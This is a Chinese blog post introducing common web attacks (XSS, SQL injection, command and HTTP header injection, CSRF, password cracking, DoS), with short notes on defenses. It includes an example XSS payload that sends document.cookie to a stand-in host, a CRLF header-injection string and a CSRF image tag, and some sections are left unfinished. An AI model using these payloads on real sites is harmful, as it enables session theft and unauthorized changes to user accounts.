安科网

web安全

AquariusYuxin

AquariusYuxin

2019-07-01

关注 关注

对web的攻击可分为两大类:

  • 主动攻击
    该类攻击是攻击者直接对web服务器上的资源进行攻击,最具代表性的是SQL注入攻击和OS攻击及DDOS攻击。
  • 被动攻击
    攻击者不直接对服务器发起攻击,事先设置好雷区,等待雷区被触发,具有代表性的有跨站脚本攻击和跨站点请求伪造。

因输出值转义不完全引起的安全漏洞

xss 跨站脚本攻击

Cross SiteScript,跨站脚本攻击,又称css攻击。

其核心思路就是将恶意html代码注入到目标网站中(如<script type="text/javascript">alert('boom!')</script>),所以经常发生在动态生成html的场景下。

攻击成功后可以做的事情有很多,比如将cookie发送出去,URL跳转等。

只要有用户输入的地方,数据存储时没有对其进行处理,用到改数据的页面都有可能受到XSS攻击(对于script的攻击方式,数据以直接拍到页面的方式才会使攻击生效,ajax请求到数据再通过mvvm框架渲染的方式是不会触发脚本的执行的。但,XSS攻击不仅仅局限于script)

XSS的危害

  • 利用虚假表单骗取用户个人信息
  • 窃取用户cookie

拿微博举例,如果某人发了一段包含<script>window.open(“www.aa.com?param=”+document.cookie)</script>的微博,且XSS攻击成功,那么看到该微博的人都会受到攻击,其cookie被发送至www.aa.com

  • 对用户输入的<>""''/&等字符进行转码
  • 对关键cookie进行http-only设置,这样js就失去了访问cookie的能力

SQL注入攻击

在web应用对数据库的查询,添加,删除等操作环节,请求参数参与SQL语句生成,对于调用SQL语句的拼接环节存在疏忽,产生SQL注入攻击。

危害

  • 非法查看无权限数据
  • 删除数据

举例:todo

todo

OS命令注入攻击

web应用可以通过shell调用系统命令,因此如果在调用时存在疏忽,就有可能执行了不被期望的OS命令。

危害

http首部注入攻击

%0D%0A代表HTTP报文中的换行符。比如在响应头中的Location:www.a.com/aa?id=999添加为Location:www.a.com/aa?id=999%0D%0ASet-Cookie: xxxx,那么就会多出一个set-cookie响应头。此外,连续出现两次%0D%0标志着http头部与主体的分离,同样可以利用这个来修改响应主体。

指的是攻击者通过在响应头部字段中插入换行,添加任意响应首部的一种攻击

危害

  • 设置任意cookie(利用Set-Cookie头)
  • 重定向至任意url(location头)(如果status为200但是有location会怎么样)

话管理疏忽引起的安全漏洞

会话劫持

通过手段拿到用户的会话id并以此id伪装为用户de攻击。

危害

跨站点请求伪造CSRF(cross-site request Forgery)

指攻击者通过事先设定好的陷阱,在用户不知道的情况下发起对某些站点的请求,从而达到修改用户在目标网站里的数据的攻击。
如在a.com里有个<img src="b.com/account/delete" />的标签,此时用户访问a站点时就向b发起了delete请求,假设该接口就是b站点的删除帐号api,且b用户恰恰刚访问了b站点不久,还存有未过期的cookie,那就惨了。

危害

  • 修改用户在目标站点的数据。

  • cookie的有效期尽量缩短
  • 服务器判断referer

其他安全漏洞

密码破解

  • 字典攻击

事先收集好一组候选密码一一尝试

  • 穷举攻击

如银行密码是四位数字,则穷举即可。

危害

DoS(Denial of Service)攻击

链接描述
一种让运行中的服务器呈停止中的攻击
分布式的多台计算机发起的dos攻击称为ddos(distributed Denial of Service)攻击

在第三次握手环节耍流氓不响应服务器,造成tcp半连接状态。不停地发送syn握手,就会造成服务器资源大大消耗。
或者tcp全连接,但是每个连接都不释放,最终达到服务器上限,瘫痪
web安全
1.制造大流量无用数据,造成通往被攻击主机的网络拥塞,使被攻击主机无法正常和外界通信。
2.利用被攻击主机提供服务或传输协议上处理重复连接的缺陷,反复高频的发出攻击性的重复服务请求,使被攻击主机无法及时处理其它正常的请求。
3.利用被攻击主机所提供服务程序或传输协议的本身实现缺陷,反复发送畸形的攻击数据引发系统错误的分配大量系统资源,使主机处于挂起状态甚至死机。

危害

直接使服务器挂掉,影响了公司服务正常运转

  • 提高服务器带宽,性能等
  • 硬件防火墙专门过滤恶意来源的请求
  • ng设置黑名单
location / {
  deny 1.2.3.4;
}
  • 上cdn

web安全 h2

AquariusYuxin

AquariusYuxin

0 关注 0 粉丝 0 动态

关注 关注

相关推荐

Web安全:文件解析漏洞

PHP是用C语言编写的,MySQL则是用C++编写的,而Apache则大部分是使用C语言编写的,少部分是使用C++编写的。所以,文件解析漏洞的本质还是需要我们挖掘C语言、C++的漏洞。文件解析漏洞是指中间件在解析文件时出现了漏洞,从而攻击者可以利用该漏洞实

杜倩 2020-10-29

ScanT3r:一款功能强大的Web安全扫描工具

远程代码执行漏洞-Linux;模板注入漏洞:Jinja2、ERB、Java、Twig、Freemarker;注意:ScanT3r仅支持Python > 3.6环境。首先,打开命令行终端窗口。

ldh 2020-10-05

web安全pikachu靶场之SQL注入

数据库注入漏洞,主要是开发人员在构建代码时, 没有对输入边界进行安全考虑,导致攻击者可以通过合法的输入点提交一些精心构造的语句,从而欺骗后台数据库对其进行执行,导致数据库信息泄漏的一-种漏洞。在owasp发布的top10排行榜里,注入漏洞一直是危害排名第一

一对儿程序猿 2020-07-04

无相劫指:Web安全之其他漏洞专题二-第八天

CSRF漏洞和XSS漏洞很像,但二者是有区别的,XSS容易被发现,攻击者要登录后台攻击,管理员可以发现,但CSRF是就是通过管理员来执行攻击的,攻击者只提供代码。在前端通过一些操作访问到一些后台数据信息,得到敏感信息例如内网地址,绝地路径,数据库,目录结构

ahnuzfm 2020-06-25

第四天——Web安全之文件上传漏洞专题.

上传到web服务器上,并进行解析运行上传的脚本木马,进而达到自己的目的。如果服务器的处理逻辑做的不够安 全,则会导致严重的后果。如应用只能上传.doc文件时攻击者可以先将.php文件后缀修改为.doc,成功上传后在修改文件名 时将后缀改回.php。个人理解

三动 2020-06-16

第三天--注入攻击:Web安全之SQL注入漏洞专题

第三天--注入攻击:Web安全之SQL注入漏洞专题。SQL手工注入上节课就讲过了,简单复习下。使用union联合查询数据库,数据表,字段以及字段信息。Sqlmap.py –u URL –p 具体参数。结合Burpsuite读取日志文件。Burp提取HTTP

godfather 2020-06-13

信息安全之Web安全

眼见不一定为真,就算是某正牌的官网,所发布的消息也一定要核实。首先右击鼠标,选择“检查”,在一下任务栏中,我们可以查看和改变网页上的内容。Console:可以查看错误信息、打印调试信息、调试js代码,还可以当作Javascript API查看。Networ

gongruitao 2020-06-09

2019-2020-2 网络对抗技术 20172327 Exp9 Web安全基础

做不少于7个题目,共3.5分。抓图包括学号,P图或无学号,扣0.5分 . SQL注入是指web应用程序对用户输入数据的合法性没有判断,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,以此来实现欺骗数据库服务器执行非授权的任意查

ahnuzfm 2020-05-31

2019-2020-2 20175315陈煜扬《网络对抗技术》 Exp9 Web安全基础

之后在文件的目录下执行命令java -jar webgoat-container-7.0.1-war-exec.jar. 在正常的参数提交过程中添加恶意代码以执行某条指令。

sswqycbailong 2020-05-31

2019-2020-2 网络对抗技术 20175213吕正宏 Exp9 Web安全基础

本实践的目标理解常用网络攻击技术的基本原理,做不少于7个题目,共3.5分。Webgoat实践下相关实验。应用程序会将输入带入后台的SQL查询语句,后台数据库将其认作正常SQL指令后正常执行,可能实现对后台数据库进行各种操作,甚至造成破坏后台数据库等严重后果

三动 2020-05-29

2019-2020-2 20175235 泽仁拉措《网络对抗技术》 Exp9 web安全基础

WebGoat: Webgoat是OWASP组织研究出的一个专门进行web漏洞实验的应用品台,这个平台里包含了web中常见的各种漏洞,例如:跨站脚本攻击、sql注入、访问控制、隐藏字段、Cookie等;在命令注入的漏洞中,最为常见的是PHP的命令注入。例如

shayuchaor 2020-05-29

2019-2020-2 20175228 李玥琛《网络对抗技术》Exp9 Web安全基础

下载webgoat-container-7.0.1-war-exec.jar,然后输入 java -jar webgoat-container-7.0.1-war-exec.jar 开启WebGoat. 在左侧菜单栏中选择Injection Flaws-&

Bellboy 2020-05-27

Exp9 Web安全基础

理解和应用常用网络攻击技术的基本原理。如果我们的应用程序将不安全的用户输入传递给了系统命令解析器,那么命令攻击就有可能发生。选中 Injection Flaws->Command Injection->inspect Element,右键选中i

fengyun 2020-05-26

20174320 王灏汉《网络对抗技术》Exp9 Web安全基础

下载好后在webgoat-container-7.0.1-war-exec.jar目录下执行命令java -jar webgoat-container-7.0.1-war-exec.jar. 命令注入攻击对任何一个以参数驱动的站点来说都是一个严重威胁。尽管

Bellboy 2020-05-26

2019-2020-2 网络对抗技术 20175224 Exp9 Web安全基础

通过在用户名、密码登输入框中输入一些‘,--,#等特殊字符,实现引号闭合、注释部分SQL语句,利用永真式实现登录、显示信息等目的。其实就是输入框中的字符提交到后台的数据库中会与SQL语句组合拼接,针对程序员编程时的疏忽,通过SQL语句,实现无帐号登录,甚至

数据库工具开发 2020-05-26

OWASP TOP 10 web安全威胁---A注入攻击

当应用程序将用户输入的内容拼接到SQL语句中,一起提交给数据库执行时,就会产生SQL注入威胁。在web应用服务器前部署WAF设备。攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题。也就是说服务器端接收和解析了来自用户

重善奉行 2020-05-25

20175110 王礼博 Exp 9 Web安全基础

具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。与XSS攻击相比,CSRF攻击往往不大流行和难以

zhuangnet 2020-05-20

《白帽子讲Web安全》读后感(一)

就是对数据做等级划分,互联网安全的核心问题,是数据安全的问题。做资产等级划分的过程,需要与各个业务部门的负责人一一沟通,了解公司最重要的资产是什么,他们最看重的数据是什么。注意与“风险分析”区别。威胁分析就是把所有的威胁都找出来。浏览器的同源策略,限制了来

xiaoemo0 2020-05-16

玄魂工作室磐石计划,web安全教程免费领,零门槛白嫖价值数万元奖品!

文章分为前言、课程目录、活动奖品预览和抽奖四部分,阅读完毕大概需要占用您4分钟时间。大家好,我是山丘安全实验室的 “陈殷”,首次做客 玄魂工作室,本次活动是山丘安全实验室和玄魂工作室联合推出的。之所以有这次合作,是因为玄魂老哥的一句话:。机缘巧合,玄魂老哥

fraternityjava 2020-05-08

保护IIS Web服务器安全的技巧

  保护Web服务器的第一步是确保网络管理员清楚安全策略中的每一项制度。如果公司高层没有把服务器的安全看作是必须被保护的资产,那么保护工作是完全没有意义的。这项工作需要长期的努力。如果预算不支持或者它不是长期IT战略的一部分,那么花费大量时间保护服务器安全

SoarFly00 2020-05-05
AquariusYuxin

AquariusYuxin

W3CSchool教程
HTML 教程
CSS 教程
Bootstrap 教程
Javascript 教程
jQuery 教程
后端教程
C 教程
Java 教程
PHP 教程
Python 教程
Go 教程
移动开发
Android 教程
Swift 教程
Kotlin 教程
jQuery Mobile 教程
ionic 教程
关于我们
新闻动态
联系方式
招聘英才
安科实验室
帮助与反馈

安科网(Ancii),中国第一极客网

Copyright © 2013 - 2019 Ancii.com

京ICP备18063983号 京公网安备11010802014868号